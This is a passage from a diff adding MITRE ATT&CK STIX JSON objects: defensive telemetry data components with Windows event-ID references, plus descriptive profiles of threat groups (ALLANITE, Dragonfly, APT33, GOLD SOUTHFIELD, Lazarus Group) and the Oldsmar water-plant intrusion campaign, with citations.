"modified": "2021-10-20T15:05:19.273Z", + "name": "Drive Modification", + "description": "Changes made to a drive letter or mount point of a data storage device", + "x_mitre_data_source_ref": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-21T21:47:58.629Z", + "name": "Asset Inventory", + "description": "This includes sources of current and expected devices on the network, including the manufacturer, model, and necessary identifiers (e.g., IP and hardware addresses)", + "x_mitre_data_source_ref": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--b05a614b-033c-4578-b4f2-c63a9feee706", + "created": "2022-09-23T16:34:00.912Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-21T15:56:01.070Z", + "name": "Oldsmar Treatment Plant Intrusion", + "description": "[Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009) was a cyber incident involving a water treatment facility in Florida. During this incident, unidentified threat actors leveraged features of the system to access and modify setpoints for a specific chemical required in the treatment process. The incident was detected immediately and prevented before it could cause any harm to the public.(Citation: Pinellas County Sheriffs Office February 2021)(Citation: CISA AA21-042A Water Treatment Intrusion Feb 2021)(Citation: Dragos Oldsmar Feb 2021)", + "aliases": [ + "Oldsmar Treatment Plant Intrusion" + ], + "first_seen": "2021-02-01T05:00:00.000Z", + "last_seen": "2021-02-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_last_seen_citation": "(Citation: Pinellas County Sheriffs Office February 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--65281d3e-b03c-46b8-8cd8-716363ac3cb2", + "created": "2022-09-20T20:53:14.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0009", + "external_id": "C0009" + }, + { + "source_name": "CISA AA21-042A Water Treatment Intrusion Feb 2021", + "description": "CISA. (2021, February 11). Compromise of U.S. Water Treatment Facility . Retrieved October 18, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa21-042a" + }, + { + "source_name": "Pinellas County Sheriffs Office February 2021", + "description": "Pinellas County Sheriffs Office 2021, February 8 Treatment Plant Intrusion Press Conference Retrieved. 2021/10/08 ", + "url": "https://www.youtube.com/watch?v=MkXDSOgLQ6M" + }, + { + "source_name": "Dragos Oldsmar Feb 2021", + "description": "Serino, G., et al . (2021, February 8). Recommendations Following the Oldsmar Water Treatment Facility Cyber Attack. Retrieved October 21, 2022.", + "url": "https://www.dragos.com/blog/industry-news/recommendations-following-the-oldsmar-water-treatment-facility-cyber-attack/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ] + }, + { + "modified": "2023-04-21T15:41:36.287Z", + "name": "OS API Execution", + "description": "Operating system function/method calls executed by a process", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "aliases": [ + "ALLANITE", + "Palmetto Fusion" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "intrusion-set", + "id": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "created": "2017-05-31T21:31:57.307Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "G1000", + "url": "https://attack.mitre.org/groups/G1000" + }, + { + "source_name": "Dragos", + "url": "https://dragos.com/resource/allanite/", + "description": "Dragos Allanite Retrieved. 2019/10/27 " + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) is a suspected Russian cyber espionage group, that has primarily targeted the electric utility sector within the United States and United Kingdom. The group's tactics and techniques are reportedly similar to [Dragonfly](https://attack.mitre.org/groups/G0035), although [ALLANITE](https://attack.mitre.org/groups/G1000)s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence. (Citation: Dragos)", + "modified": "2022-05-24T19:26:10.721Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "ALLANITE", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--ee575f4a-2d4f-48f6-b18b-89067760adc1", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.272Z", + "name": "Process Metadata", + "description": "Contextual data about a running process, which may include information such as environment variables, image name, user/owner, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:18:06.745Z", + "name": "Network Connection Creation", + "description": "Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log)", + "x_mitre_data_source_ref": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:03:28.170Z", + "name": "Dragonfly", + "description": "[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017)", + "aliases": [ + "Dragonfly", + "TEMP.Isotope", + "DYMALLOY", + "Berserk Bear", + "TG-4192", + "Crouching Yeti", + "IRON LIBERTY", + "Energetic Bear" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--1c63d4ec-0a75-4daa-b1df-0d11af3d3cc1", + "created": "2017-05-31T21:32:05.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0035", + "external_id": "G0035" + }, + { + "source_name": "DYMALLOY", + "description": "(Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Berserk Bear", + "description": "(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TEMP.Isotope", + "description": "(Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021)" + }, + { + "source_name": "Crouching Yeti", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "IRON LIBERTY", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "TG-4192", + "description": "(Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Dragonfly", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "Energetic Bear", + "description": "(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022)" + }, + { + "source_name": "CISA AA20-296A Berserk Bear December 2020", + "description": "CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions" + }, + { + "source_name": "DOJ Russia Targeting Critical Infrastructure March 2022", + "description": "Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.", + "url": "https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical" + }, + { + "source_name": "Dragos DYMALLOY ", + "description": "Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.", + "url": "https://www.dragos.com/threat/dymalloy/" + }, + { + "source_name": "Fortune Dragonfly 2.0 Sept 2017", + "description": "Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.", + "url": "http://fortune.com/2017/09/06/hack-energy-grid-symantec/" + }, + { + "source_name": "Mandiant Ukraine Cyber Threats January 2022", + "description": "Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.", + "url": "https://www.mandiant.com/resources/ukraine-crisis-cyber-threats" + }, + { + "source_name": "Secureworks MCMD July 2019", + "description": "Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.", + "url": "https://www.secureworks.com/research/mcmd-malware-analysis" + }, + { + "source_name": "Secureworks IRON LIBERTY July 2019", + "description": "Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector" + }, + { + "source_name": "Secureworks Karagany July 2019", + "description": "Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.", + "url": "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector" + }, + { + "source_name": "Gigamon Berserk Bear October 2021", + "description": "Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.", + "url": "https://vblocalhost.com/uploads/VB2021-Slowik.pdf" + }, + { + "source_name": "Symantec Dragonfly Sept 2017", + "description": "Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.", + "url": "https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers" + }, + { + "source_name": "Symantec Dragonfly", + "description": "Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.", + "url": "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + }, + { + "source_name": "Symantec Dragonfly 2.0 October 2017", + "description": "Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks" + }, + { + "source_name": "UK GOV FSB Factsheet April 2022", + "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022.", + "url": "https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:07:25.123Z", + "name": "APT33", + "description": "[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "aliases": [ + "APT33", + "HOLMIUM", + "Elfin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0064", + "external_id": "G0064" + }, + { + "source_name": "APT33", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "HOLMIUM", + "description": "(Citation: Microsoft Holmium June 2020)" + }, + { + "source_name": "Elfin", + "description": "(Citation: Symantec Elfin Mar 2019)" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + }, + { + "source_name": "Microsoft Holmium June 2020", + "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Symantec Elfin Mar 2019", + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Access", + "description": "Opening a file, which makes the file contents available to the requestor (ex: Windows EID 4663)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "File Metadata", + "description": "Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/ower, permissions, etc.", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Firmware Modification", + "description": "Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record)", + "x_mitre_data_source_ref": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--1177a4c5-31c8-400c-8544-9071166afa0e", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Windows Registry Key Deletion", + "description": "Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12)", + "x_mitre_data_source_ref": "x-mitre-data-source--0f42a24c-e035-4f93-a91c-5f7076bd8da0", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f42df6f0-6395-4f0c-9376-525a031f00c3", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.271Z", + "name": "Scheduled Job Creation", + "description": "Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-07T16:18:20.802Z", + "name": "Logon Session Creation", + "description": "Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp)", + "x_mitre_data_source_ref": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "x_mitre_deprecated": false, + "x_mitre_version": "1.1", + "type": "x-mitre-data-component", + "id": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--f5468e67-51c7-4756-9b4f-65707708e7fa", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.275Z", + "name": "Network Share Access", + "description": "Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)", + "x_mitre_data_source_ref": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.805Z", + "name": "File Deletion", + "description": "Removal of a file (ex: Sysmon EID 23, macOS ESF EID ES_EVENT_TYPE_AUTH_UNLINK, or Linux commands auditd unlink, rename, rmdir, unlinked, or renameat rules)", + "x_mitre_data_source_ref": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-28T20:49:53.223Z", + "name": "GOLD SOUTHFIELD", + "description": "[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) is a financially motivated threat group active since at least 2018 that operates the [REvil](https://attack.mitre.org/software/S0496) Ransomware-as-a Service (RaaS). [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) provides backend infrastructure for affiliates recruited on underground forums to perpetrate high value deployments. By early 2020, [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) started capitalizing on the new trend of stealing data and further extorting the victim to pay for their data to not get publicly leaked.(Citation: Secureworks REvil September 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Secureworks GOLD SOUTHFIELD)(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)", + "aliases": [ + "GOLD SOUTHFIELD", + "Pinchy Spider" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Thijn Bukkems, Amazon" + ], + "type": "intrusion-set", + "id": "intrusion-set--c77c5576-ca19-42ed-a36f-4b4486a84133", + "created": "2020-09-22T19:41:27.845Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0115", + "external_id": "G0115" + }, + { + "source_name": "Pinchy Spider", + "description": "(Citation: CrowdStrike Evolution of Pinchy Spider July 2021)" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "CrowdStrike Evolution of Pinchy Spider July 2021", + "description": "Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.", + "url": "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Secureworks GOLD SOUTHFIELD", + "description": "Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.", + "url": "https://www.secureworks.com/research/threat-profiles/gold-southfield" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705", + "type": "x-mitre-data-component", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2021-10-20T15:05:19.273Z", + "name": "Service Creation", + "description": "Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs)", + "x_mitre_data_source_ref": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-30T19:01:41.451Z", + "name": "Lazarus Group", + "description": "[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094). ", + "aliases": [ + "Lazarus Group", + "Labyrinth Chollima", + "HIDDEN COBRA", + "Guardians of Peace", + "ZINC", + "NICKEL ACADEMY" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "3.2", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--c93fccb1-e8e8-42cf-ae33-2ad1d183913a", + "created": "2017-05-31T21:32:03.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0032", + "external_id": "G0032" + }, + { + "source_name": "Labyrinth Chollima", + "description": "(Citation: CrowdStrike Labyrinth Chollima Feb 2022)" + }, + { + "source_name": "ZINC", + "description": "(Citation: Microsoft ZINC disruption Dec 2017)" + }, + { + "source_name": "Lazarus Group", + "description": "(Citation: Novetta Blockbuster)" + }, + { + "source_name": "NICKEL ACADEMY", + "description": "(Citation: Secureworks NICKEL ACADEMY Dec 2017)" + }, + { + "source_name": "Guardians of Peace", + "description": "(Citation: US-CERT HIDDEN COBRA June 2017)" + }, + { + "source_name": "CrowdStrike 